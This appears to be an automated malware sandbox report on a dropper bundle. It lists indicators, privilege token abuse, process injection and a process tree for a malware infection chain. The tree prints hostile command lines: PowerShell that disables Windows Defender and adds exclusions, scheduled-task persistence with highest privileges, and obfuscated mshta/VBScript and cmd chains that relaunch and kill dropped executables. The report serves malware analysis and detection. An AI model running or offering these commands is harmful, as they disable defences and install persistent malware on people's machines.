7438a44acc4d2582f74aa5531238eef3496d71917e63b6aba65fc3a484f84f6251bef8c5ecdb3892e306e508910cc4284155fbcb5a89157e71e835bf4d72093dbe3a38505b77311b8db3c724459aa7ac6d00145a04b7ba13eb510a984141224e656187814150a6795c89de194a57d52ee65d1c532c7e98cd1a0616a46873d03404135ca171d35a7c55db5e64e13787305604e511b4298012f1793988a202117c2766b788b778f2ca0aa838ab0a64c2bf665d9584c1a1251e875d1a500b2012cc41bb6e0b5138b84bcb0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414b13ec36903f8bf4701d498261a0802ef63642bc3301f0603551d23041830168014b13ec36903f8bf4701d498261a0802ef63642bc3300d06092a864886f70d010105050003820101001c1a0697dcd79c9f3c886606085721db2147f82a67aabf183276401057c18af37ad911658e35fa9efc45b59ed94c314bb891e8432c8eb378cedbe3537971d6e5219401da55879a2464f68a66ccde9c37cda834b1699b23c89e78222b7043e35547316119ef58c5852f4e30f6a0311623c8e7e2651633cbbf1a1ba03df8ca5e8b318b6008892d0c065c52b7c4f90a98d1155f9f12be7c366338bd44a47fe4262b0ac497690de98ce2c01057b8c876129155f24869d8bc2a025b0f44d42031dbf4ba70265d90609ebc4b17092fb4cb1e4368c90727c1d25cf7ea21b968129c3c9cbf9efc805c9b63cdec47aa252767a037f300827d54d7a9f8e92e13a377e81f4a installer.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25 installer.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = 040000000100000010000000d474de575c39b2d39c8583c5c065498a0f0000000100000014000000e35ef08d884f0a0ade2f75e96301ce6230f213a8530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b060105050703086200000001000000200000007431e5f4c3c1ce4690774f0b61e05440883ba9a01ed00ba6abd7806ed3b118cf140000000100000014000000b13ec36903f8bf4701d498261a0802ef63642bc30b00000001000000120000004400690067006900430065007200740000001d00000001000000100000008f76b981d528ad4770088245e2031b630300000001000000140000005fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc25190000000100000010000000ba4f3972e7aed9dccdc210db59da13c92000000001000000c9030000308203c5308202ada003020102021002ac5c266a0b409b8f0b79f2ae462577300d06092a864886f70d0101050500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100c6cce573e6fbd4bbe52d2d32a6dfe5813fc9cd2549b6712ac3d5943467a20a1cb05f69a640b1c4b7b28fd098a4a941593ad3dc94d63cdb7438a44acc4d2582f74aa5531238eef3496d71917e63b6aba65fc3a484f84f6251bef8c5ecdb3892e306e508910cc4284155fbcb5a89157e71e835bf4d72093dbe3a38505b77311b8db3c724459aa7ac6d00145a04b7ba13eb510a984141224e656187814150a6795c89de194a57d52ee65d1c532c7e98cd1a0616a46873d03404135ca171d35a7c55db5e64e13787305604e511b4298012f1793988a202117c2766b788b778f2ca0aa838ab0a64c2bf665d9584c1a1251e875d1a500b2012cc41bb6e0b5138b84bcb0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414b13ec36903f8bf4701d498261a0802ef63642bc3301f0603551d23041830168014b13ec36903f8bf4701d498261a0802ef63642bc3300d06092a864886f70d010105050003820101001c1a0697dcd79c9f3c886606085721db2147f82a67aabf183276401057c18af37ad911658e35fa9efc45b59ed94c314bb891e8432c8eb378cedbe3537971d6e5219401da55879a2464f68a66ccde9c37cda834b1699b23c89e78222b7043e35547316119ef58c5852f4e30f6a0311623c8e7e2651633cbbf1a1ba03df8ca5e8b318b6008892d0c065c52b7c4f90a98d1155f9f12be7c366338bd44a47fe4262b0ac497690de98ce2c01057b8c876129155f24869d8bc2a025b0f44d42031dbf4ba70265d90609ebc4b17092fb4cb1e4368c90727c1d25cf7ea21b968129c3c9cbf9efc805c9b63cdec47aa252767a037f300827d54d7a9f8e92e13a377e81f4a installer.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
powershell.exepowershell.exe6872999.exe7127782.exe6044388.exeWerFault.exe4187297.exeWerFault.exe6490120.exe4934134.exeWerFault.exe2059768.exeThu13e7fdac52793516f.exepid process 3320 powershell.exe 3320 powershell.exe 3292 powershell.exe 3292 powershell.exe 3320 powershell.exe 3292 powershell.exe 2416 6872999.exe 2416 6872999.exe 5464 7127782.exe 5464 7127782.exe 1704 6044388.exe 1704 6044388.exe 6040 WerFault.exe 6040 WerFault.exe 4540 4187297.exe 4540 4187297.exe 2236 WerFault.exe 2236 WerFault.exe 5920 6490120.exe 5920 6490120.exe 5904 4934134.exe 5904 4934134.exe 5900 WerFault.exe 5900 WerFault.exe 5712 2059768.exe 5712 2059768.exe 1692 Thu13e7fdac52793516f.exe 1692 Thu13e7fdac52793516f.exe 1692 Thu13e7fdac52793516f.exe 1692 Thu13e7fdac52793516f.exe 1692 Thu13e7fdac52793516f.exe 1692 Thu13e7fdac52793516f.exe 1692 Thu13e7fdac52793516f.exe 1692 Thu13e7fdac52793516f.exe 1692 Thu13e7fdac52793516f.exe 1692 Thu13e7fdac52793516f.exe 1692 Thu13e7fdac52793516f.exe 1692 Thu13e7fdac52793516f.exe 1692 Thu13e7fdac52793516f.exe 1692 Thu13e7fdac52793516f.exe 1692 Thu13e7fdac52793516f.exe 1692 Thu13e7fdac52793516f.exe 1692 Thu13e7fdac52793516f.exe 1692 Thu13e7fdac52793516f.exe 1692 Thu13e7fdac52793516f.exe 1692 Thu13e7fdac52793516f.exe 1692 Thu13e7fdac52793516f.exe 1692 Thu13e7fdac52793516f.exe 1692 Thu13e7fdac52793516f.exe 1692 Thu13e7fdac52793516f.exe 1692 Thu13e7fdac52793516f.exe 1692 Thu13e7fdac52793516f.exe 1692 Thu13e7fdac52793516f.exe 1692 Thu13e7fdac52793516f.exe 1692 Thu13e7fdac52793516f.exe 1692 Thu13e7fdac52793516f.exe 1692 Thu13e7fdac52793516f.exe 1692 Thu13e7fdac52793516f.exe 1692 Thu13e7fdac52793516f.exe 1692 Thu13e7fdac52793516f.exe 1692 Thu13e7fdac52793516f.exe 1692 Thu13e7fdac52793516f.exe 1692 Thu13e7fdac52793516f.exe 1692 Thu13e7fdac52793516f.exe -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
Processes:
pid process 3208 -
Suspicious behavior: MapViewOfSection 2 IoCs
Processes:
BNNSqUTSmvqfjeBCDyu9kFjB.exe7DE2.exepid process 6000 BNNSqUTSmvqfjeBCDyu9kFjB.exe 5200 7DE2.exe -
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 3 IoCs
Processes:
msedge.exepid process 7100 msedge.exe 7100 msedge.exe 7100 msedge.exe -
Suspicious behavior: SetClipboardViewer 1 IoCs
Processes:
4072032.exepid process 5560 4072032.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
svchost.exesvchost.exeThu131398a3143fefd0.exe4187297.exepowershell.exepowershell.exeThu13559beef6a5272.exeWerFault.exechrome.exesvchost.exechrome update.exeWerFault.exePBrowserSetp42415.exechrome1.exechrome2.exe_qpBu0zIOrE_TG7iNbTAc9hh.exeWaaSMedicAgent.exe6490120.exetaskkill.exe2059768.exe6872999.exedescription pid process Token: SeShutdownPrivilege 3172 svchost.exe Token: SeCreatePagefilePrivilege 3172 svchost.exe Token: SeShutdownPrivilege 3172 svchost.exe Token: SeCreatePagefilePrivilege 3172 svchost.exe Token: SeShutdownPrivilege 3172 svchost.exe Token: SeCreatePagefilePrivilege 3172 svchost.exe Token: SeShutdownPrivilege 2072 svchost.exe Token: SeCreatePagefilePrivilege 2072 svchost.exe Token: SeCreateTokenPrivilege 4312 Thu131398a3143fefd0.exe Token: SeAssignPrimaryTokenPrivilege 4312 Thu131398a3143fefd0.exe Token: SeLockMemoryPrivilege 4312 Thu131398a3143fefd0.exe Token: SeIncreaseQuotaPrivilege 4312 Thu131398a3143fefd0.exe Token: SeMachineAccountPrivilege 4312 Thu131398a3143fefd0.exe Token: SeTcbPrivilege 4312 Thu131398a3143fefd0.exe Token: SeSecurityPrivilege 4312 Thu131398a3143fefd0.exe Token: SeTakeOwnershipPrivilege 4312 Thu131398a3143fefd0.exe Token: SeLoadDriverPrivilege 4312 Thu131398a3143fefd0.exe Token: SeSystemProfilePrivilege 4312 Thu131398a3143fefd0.exe Token: SeSystemtimePrivilege 4312 Thu131398a3143fefd0.exe Token: SeProfSingleProcessPrivilege 4312 Thu131398a3143fefd0.exe Token: SeIncBasePriorityPrivilege 4312 Thu131398a3143fefd0.exe Token: SeCreatePagefilePrivilege 4312 Thu131398a3143fefd0.exe Token: SeCreatePermanentPrivilege 4312 Thu131398a3143fefd0.exe Token: SeBackupPrivilege 4312 Thu131398a3143fefd0.exe Token: SeRestorePrivilege 4312 Thu131398a3143fefd0.exe Token: SeShutdownPrivilege 4312 Thu131398a3143fefd0.exe Token: SeDebugPrivilege 4312 Thu131398a3143fefd0.exe Token: SeAuditPrivilege 4312 Thu131398a3143fefd0.exe Token: SeSystemEnvironmentPrivilege 4312 Thu131398a3143fefd0.exe Token: SeChangeNotifyPrivilege 4312 Thu131398a3143fefd0.exe Token: SeRemoteShutdownPrivilege 4312 Thu131398a3143fefd0.exe Token: SeUndockPrivilege 4312 Thu131398a3143fefd0.exe Token: SeSyncAgentPrivilege 4312 Thu131398a3143fefd0.exe Token: SeEnableDelegationPrivilege 4312 Thu131398a3143fefd0.exe Token: SeManageVolumePrivilege 4312 Thu131398a3143fefd0.exe Token: SeImpersonatePrivilege 4312 Thu131398a3143fefd0.exe Token: SeCreateGlobalPrivilege 4312 Thu131398a3143fefd0.exe Token: 31 4312 Thu131398a3143fefd0.exe Token: 32 4312 Thu131398a3143fefd0.exe Token: 33 4312 Thu131398a3143fefd0.exe Token: 34 4312 Thu131398a3143fefd0.exe Token: 35 4312 Thu131398a3143fefd0.exe Token: SeDebugPrivilege 4540 4187297.exe Token: SeDebugPrivilege 3320 powershell.exe Token: SeDebugPrivilege 3292 powershell.exe Token: SeDebugPrivilege 2520 Thu13559beef6a5272.exe Token: SeDebugPrivilege 5628 WerFault.exe Token: SeDebugPrivilege 6100 chrome.exe Token: SeDebugPrivilege 1512 svchost.exe Token: SeDebugPrivilege 3128 chrome update.exe Token: SeRestorePrivilege 6040 WerFault.exe Token: SeBackupPrivilege 6040 WerFault.exe Token: SeBackupPrivilege 6040 WerFault.exe Token: SeDebugPrivilege 1220 PBrowserSetp42415.exe Token: SeDebugPrivilege 5880 chrome1.exe Token: SeDebugPrivilege 6128 chrome2.exe Token: SeDebugPrivilege 5928 _qpBu0zIOrE_TG7iNbTAc9hh.exe Token: SeDebugPrivilege 4092 WaaSMedicAgent.exe Token: SeDebugPrivilege 5920 6490120.exe Token: SeDebugPrivilege 4520 taskkill.exe Token: SeDebugPrivilege 5712 2059768.exe Token: SeDebugPrivilege 2416 6872999.exe Token: SeIncreaseQuotaPrivilege 3320 powershell.exe Token: SeSecurityPrivilege 3320 powershell.exe -
Suspicious use of FindShellTrayWindow 3 IoCs
Processes:
Calculator.exemsedge.exeinstaller.exepid process 3540 Calculator.exe 7100 msedge.exe 2516 installer.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
svchost.exesetup_x86_x64_install.exesetup_installer.exesetup_install.execmd.execmd.execmd.execmd.exedescription pid process target process PID 2072 wrote to memory of 1864 2072 svchost.exe MoUsoCoreWorker.exe PID 2072 wrote to memory of 1864 2072 svchost.exe MoUsoCoreWorker.exe PID 3600 wrote to memory of 3232 3600 setup_x86_x64_install.exe setup_installer.exe PID 3600 wrote to memory of 3232 3600 setup_x86_x64_install.exe setup_installer.exe PID 3600 wrote to memory of 3232 3600 setup_x86_x64_install.exe setup_installer.exe PID 3232 wrote to memory of 2860 3232 setup_installer.exe setup_install.exe PID 3232 wrote to memory of 2860 3232 setup_installer.exe setup_install.exe PID 3232 wrote to memory of 2860 3232 setup_installer.exe setup_install.exe PID 2860 wrote to memory of 1564 2860 setup_install.exe cmd.exe PID 2860 wrote to memory of 1564 2860 setup_install.exe cmd.exe PID 2860 wrote to memory of 1564 2860 setup_install.exe cmd.exe PID 2860 wrote to memory of 2068 2860 setup_install.exe cmd.exe PID 2860 wrote to memory of 2068 2860 setup_install.exe cmd.exe PID 2860 wrote to memory of 2068 2860 setup_install.exe cmd.exe PID 2860 wrote to memory of 1012 2860 setup_install.exe cmd.exe PID 2860 wrote to memory of 1012 2860 setup_install.exe cmd.exe PID 2860 wrote to memory of 1012 2860 setup_install.exe cmd.exe PID 2860 wrote to memory of 2128 2860 setup_install.exe cmd.exe PID 2860 wrote to memory of 2128 2860 setup_install.exe cmd.exe PID 2860 wrote to memory of 2128 2860 setup_install.exe cmd.exe PID 2860 wrote to memory of 3312 2860 setup_install.exe cmd.exe PID 2860 wrote to memory of 3312 2860 setup_install.exe cmd.exe PID 2860 wrote to memory of 3312 2860 setup_install.exe cmd.exe PID 2068 wrote to memory of 3292 2068 cmd.exe powershell.exe PID 2068 wrote to memory of 3292 2068 cmd.exe powershell.exe PID 2068 wrote to memory of 3292 2068 cmd.exe powershell.exe PID 1564 wrote to memory of 3320 1564 cmd.exe powershell.exe PID 1564 wrote to memory of 3320 1564 cmd.exe powershell.exe PID 1564 wrote to memory of 3320 1564 cmd.exe powershell.exe PID 2860 wrote to memory of 4092 2860 setup_install.exe cmd.exe PID 2860 wrote to memory of 4092 2860 setup_install.exe cmd.exe PID 2860 wrote to memory of 4092 2860 setup_install.exe cmd.exe PID 2860 wrote to memory of 3060 2860 setup_install.exe cmd.exe PID 2860 wrote to memory of 3060 2860 setup_install.exe cmd.exe PID 2860 wrote to memory of 3060 2860 setup_install.exe cmd.exe PID 2860 wrote to memory of 3276 2860 setup_install.exe cmd.exe PID 2860 wrote to memory of 3276 2860 setup_install.exe cmd.exe PID 2860 wrote to memory of 3276 2860 setup_install.exe cmd.exe PID 2860 wrote to memory of 2140 2860 setup_install.exe cmd.exe PID 2860 wrote to memory of 2140 2860 setup_install.exe cmd.exe PID 2860 wrote to memory of 2140 2860 setup_install.exe cmd.exe PID 2860 wrote to memory of 2160 2860 setup_install.exe cmd.exe PID 2860 wrote to memory of 2160 2860 setup_install.exe cmd.exe PID 2860 wrote to memory of 2160 2860 setup_install.exe cmd.exe PID 2860 wrote to memory of 4960 2860 setup_install.exe cmd.exe PID 2860 wrote to memory of 4960 2860 setup_install.exe cmd.exe PID 2860 wrote to memory of 4960 2860 setup_install.exe cmd.exe PID 2860 wrote to memory of 836 2860 setup_install.exe cmd.exe PID 2860 wrote to memory of 836 2860 setup_install.exe cmd.exe PID 2860 wrote to memory of 836 2860 setup_install.exe cmd.exe PID 2860 wrote to memory of 1052 2860 setup_install.exe cmd.exe PID 2860 wrote to memory of 1052 2860 setup_install.exe cmd.exe PID 2860 wrote to memory of 1052 2860 setup_install.exe cmd.exe PID 2860 wrote to memory of 3524 2860 setup_install.exe cmd.exe PID 2860 wrote to memory of 3524 2860 setup_install.exe cmd.exe PID 2860 wrote to memory of 3524 2860 setup_install.exe cmd.exe PID 2860 wrote to memory of 4548 2860 setup_install.exe cmd.exe PID 2860 wrote to memory of 4548 2860 setup_install.exe cmd.exe PID 2860 wrote to memory of 4548 2860 setup_install.exe cmd.exe PID 4092 wrote to memory of 4540 4092 cmd.exe Thu13a8cbc236137c.exe PID 4092 wrote to memory of 4540 4092 cmd.exe Thu13a8cbc236137c.exe PID 2128 wrote to memory of 2216 2128 cmd.exe Thu13f11af06b.exe PID 2128 wrote to memory of 2216 2128 cmd.exe Thu13f11af06b.exe PID 2128 wrote to memory of 2216 2128 cmd.exe Thu13f11af06b.exe
Processes
-
C:\Windows\System32\sihclient.exeC:\Windows\System32\sihclient.exe /cv 1FPS8FyOPkmM3Jgu9Ybc4Q.0.21⤵PID:4448
-
C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install.exe"C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:3600 -
C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:3232 -
C:\Users\Admin\AppData\Local\Temp\7zS0ACD4CA4\setup_install.exe"C:\Users\Admin\AppData\Local\Temp\7zS0ACD4CA4\setup_install.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:2860 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true -SubmitSamplesConsent NeverSend -MAPSReporting Disable4⤵
- Suspicious use of WriteProcessMemory
PID:1564 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true -SubmitSamplesConsent NeverSend -MAPSReporting Disable5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3320 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"4⤵
- Suspicious use of WriteProcessMemory
PID:2068 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3292 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Thu13e7fdac52793516f.exe4⤵PID:1012
-
C:\Users\Admin\AppData\Local\Temp\7zS0ACD4CA4\Thu13e7fdac52793516f.exeThu13e7fdac52793516f.exe5⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:1692 -
C:\Users\Admin\Pictures\Adobe Films\0kAFG6Gb0qZcLRAssa3HEQSW.exe"C:\Users\Admin\Pictures\Adobe Films\0kAFG6Gb0qZcLRAssa3HEQSW.exe"6⤵
- Executes dropped EXE
- Checks processor information in registry
- Enumerates system info in registry
PID:6152 -
C:\Users\Admin\Pictures\Adobe Films\F1urGyB1VL0Ad85vTpMHfs9Q.exe"C:\Users\Admin\Pictures\Adobe Films\F1urGyB1VL0Ad85vTpMHfs9Q.exe"6⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
- Executes dropped EXE
PID:5408 -
C:\Users\Admin\Pictures\Adobe Films\hkrn8zol2NQwEcEiGW9lzkvQ.exe"C:\Users\Admin\Pictures\Adobe Films\hkrn8zol2NQwEcEiGW9lzkvQ.exe"6⤵
- Executes dropped EXE
- Drops file in Program Files directory
PID:5804 -
C:\Users\Admin\Documents\vD4jlVp3UdWH6EHhvBtubC0C.exe"C:\Users\Admin\Documents\vD4jlVp3UdWH6EHhvBtubC0C.exe"7⤵PID:4016
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl LG" /sc ONLOGON /rl HIGHEST7⤵
- Creates scheduled task(s)
PID:7016 -
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl HR" /sc HOURLY /rl HIGHEST7⤵
- Executes dropped EXE
- Creates scheduled task(s)
PID:6244 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV18⤵PID:5588
-
C:\Users\Admin\Pictures\Adobe Films\sghartv8e9qtyqUcfKQujwya.exe"C:\Users\Admin\Pictures\Adobe Films\sghartv8e9qtyqUcfKQujwya.exe"6⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
PID:4696 -
C:\Users\Admin\Pictures\Adobe Films\sghartv8e9qtyqUcfKQujwya.exe"C:\Users\Admin\Pictures\Adobe Films\sghartv8e9qtyqUcfKQujwya.exe"7⤵PID:4492
-
C:\Users\Admin\Pictures\Adobe Films\sghartv8e9qtyqUcfKQujwya.exe"C:\Users\Admin\Pictures\Adobe Films\sghartv8e9qtyqUcfKQujwya.exe"7⤵PID:5084
-
C:\Users\Admin\Pictures\Adobe Films\sghartv8e9qtyqUcfKQujwya.exe"C:\Users\Admin\Pictures\Adobe Films\sghartv8e9qtyqUcfKQujwya.exe"7⤵PID:2176
-
C:\Users\Admin\AppData\Local\Temp\fl.exe"C:\Users\Admin\AppData\Local\Temp\fl.exe"8⤵PID:2340
-
C:\Users\Admin\AppData\Local\Temp\winlogson.exe"C:\Users\Admin\AppData\Local\Temp\winlogson.exe"9⤵PID:2232
-
C:\Users\Admin\Pictures\Adobe Films\EZetOP9i3zgHCVJL2BPdwiFu.exe"C:\Users\Admin\Pictures\Adobe Films\EZetOP9i3zgHCVJL2BPdwiFu.exe"6⤵
- Drops file in Program Files directory
PID:4848 -
C:\Program Files (x86)\Company\NewProduct\cm3.exe"C:\Program Files (x86)\Company\NewProduct\cm3.exe"7⤵PID:6472
-
C:\Program Files (x86)\Company\NewProduct\jg1_1faf.exe"C:\Program Files (x86)\Company\NewProduct\jg1_1faf.exe"7⤵
- Checks whether UAC is enabled
PID:3808 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3808 -s 18248⤵
- Program crash
PID:4692 -
C:\Program Files (x86)\Company\NewProduct\inst2.exe"C:\Program Files (x86)\Company\NewProduct\inst2.exe"7⤵PID:1164
-
C:\Users\Admin\Pictures\Adobe Films\ZbU91MVagd34sdG4Rbt_5065.exe"C:\Users\Admin\Pictures\Adobe Films\ZbU91MVagd34sdG4Rbt_5065.exe"6⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:5740 -
C:\Users\Admin\Pictures\Adobe Films\p23DUeCJT8KlEQ6CGhlNw6C7.exe"C:\Users\Admin\Pictures\Adobe Films\p23DUeCJT8KlEQ6CGhlNw6C7.exe"6⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:3524 -
C:\Users\Admin\Pictures\Adobe Films\dg1VTPLek6Cdu2W3YLkBGjIW.exe"C:\Users\Admin\Pictures\Adobe Films\dg1VTPLek6Cdu2W3YLkBGjIW.exe"6⤵PID:6612
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6612 -s 2967⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:5984 -
C:\Users\Admin\Pictures\Adobe Films\_qpBu0zIOrE_TG7iNbTAc9hh.exe"C:\Users\Admin\Pictures\Adobe Films\_qpBu0zIOrE_TG7iNbTAc9hh.exe"6⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of AdjustPrivilegeToken
PID:5928 -
C:\Users\Admin\Pictures\Adobe Films\fRnyy_CSOjl8akfKb_oG3Szx.exe"C:\Users\Admin\Pictures\Adobe Films\fRnyy_CSOjl8akfKb_oG3Szx.exe"6⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:2344 -
C:\Users\Admin\Pictures\Adobe Films\E8DiPYyBvHk2yBAI40qJ_ufz.exe"C:\Users\Admin\Pictures\Adobe Films\E8DiPYyBvHk2yBAI40qJ_ufz.exe"6⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of SetThreadContext
PID:2184 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"7⤵PID:7036
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2184 -s 5647⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:3104 -
C:\Users\Admin\Pictures\Adobe Films\yqeRwMlYr7iIiWzJP7pXteqQ.exe"C:\Users\Admin\Pictures\Adobe Films\yqeRwMlYr7iIiWzJP7pXteqQ.exe"6⤵PID:7104
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 7104 -s 2887⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:1788 -
C:\Users\Admin\Pictures\Adobe Films\pDSfpWvMOdXLnHF5CBPs8ddZ.exe"C:\Users\Admin\Pictures\Adobe Films\pDSfpWvMOdXLnHF5CBPs8ddZ.exe"6⤵PID:1264
-
C:\Users\Admin\Pictures\Adobe Films\RiqdOtex9K5R7lgsfgaIEEDx.exe"C:\Users\Admin\Pictures\Adobe Films\RiqdOtex9K5R7lgsfgaIEEDx.exe"6⤵PID:416
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 416 -s 2927⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:5768 -
C:\Users\Admin\Pictures\Adobe Films\tYdyN5ueoppYS4GrWPmDQ0Dj.exe"C:\Users\Admin\Pictures\Adobe Films\tYdyN5ueoppYS4GrWPmDQ0Dj.exe"6⤵PID:6268
-
C:\Users\Admin\AppData\Roaming\4532497.exe"C:\Users\Admin\AppData\Roaming\4532497.exe"7⤵PID:5028
-
C:\Users\Admin\AppData\Roaming\4072032.exe"C:\Users\Admin\AppData\Roaming\4072032.exe"7⤵
- Suspicious behavior: SetClipboardViewer
PID:5560 -
C:\Users\Admin\AppData\Roaming\8062743.exe"C:\Users\Admin\AppData\Roaming\8062743.exe"7⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:1892 -
C:\Users\Admin\AppData\Roaming\8602699.exe"C:\Users\Admin\AppData\Roaming\8602699.exe"7⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:4312 -
C:\Users\Admin\AppData\Roaming\3250216.exe"C:\Users\Admin\AppData\Roaming\3250216.exe"7⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:4660 -
C:\Users\Admin\AppData\Roaming\8171918.exe"C:\Users\Admin\AppData\Roaming\8171918.exe"7⤵PID:3716
-
C:\Users\Admin\AppData\Roaming\6567327.exe"C:\Users\Admin\AppData\Roaming\6567327.exe"8⤵PID:7060
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbscRiPT: ClOSe ( CREAteOBJeCT ("wScript.SHELl" ). ruN ( "cMD.Exe /q /R cOPY /y ""C:\Users\Admin\AppData\Roaming\6567327.exe"" ..\5ERbq~WXXVZJ.Exe && starT ..\5ERBq~WXXVZJ.exE -p1MldDG_NCbaD4X & If """" == """" for %P in ( ""C:\Users\Admin\AppData\Roaming\6567327.exe"") do taskkill -F /IM ""%~nxP"" " ,0 , trUE) )9⤵PID:5636
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /q /R cOPY /y "C:\Users\Admin\AppData\Roaming\6567327.exe" ..\5ERbq~WXXVZJ.Exe && starT ..\5ERBq~WXXVZJ.exE -p1MldDG_NCbaD4X & If "" =="" for %P in ( "C:\Users\Admin\AppData\Roaming\6567327.exe") do taskkill -F /IM "%~nxP"10⤵PID:5644
-
C:\Users\Admin\AppData\Local\Temp\5ERbq~WXXVZJ.Exe..\5ERBq~WXXVZJ.exE -p1MldDG_NCbaD4X11⤵PID:4240
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbscRiPT: ClOSe ( CREAteOBJeCT ("wScript.SHELl" ). ruN ( "cMD.Exe /q /R cOPY /y ""C:\Users\Admin\AppData\Local\Temp\5ERbq~WXXVZJ.Exe"" ..\5ERbq~WXXVZJ.Exe && starT ..\5ERBq~WXXVZJ.exE -p1MldDG_NCbaD4X & If ""-p1MldDG_NCbaD4X "" == """" for %P in ( ""C:\Users\Admin\AppData\Local\Temp\5ERbq~WXXVZJ.Exe"") do taskkill -F /IM ""%~nxP"" " ,0 , trUE) )12⤵PID:4804
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /q /R cOPY /y "C:\Users\Admin\AppData\Local\Temp\5ERbq~WXXVZJ.Exe" ..\5ERbq~WXXVZJ.Exe && starT ..\5ERBq~WXXVZJ.exE -p1MldDG_NCbaD4X & If "-p1MldDG_NCbaD4X " =="" for %P in ( "C:\Users\Admin\AppData\Local\Temp\5ERbq~WXXVZJ.Exe") do taskkill -F /IM "%~nxP"13⤵PID:4700
-
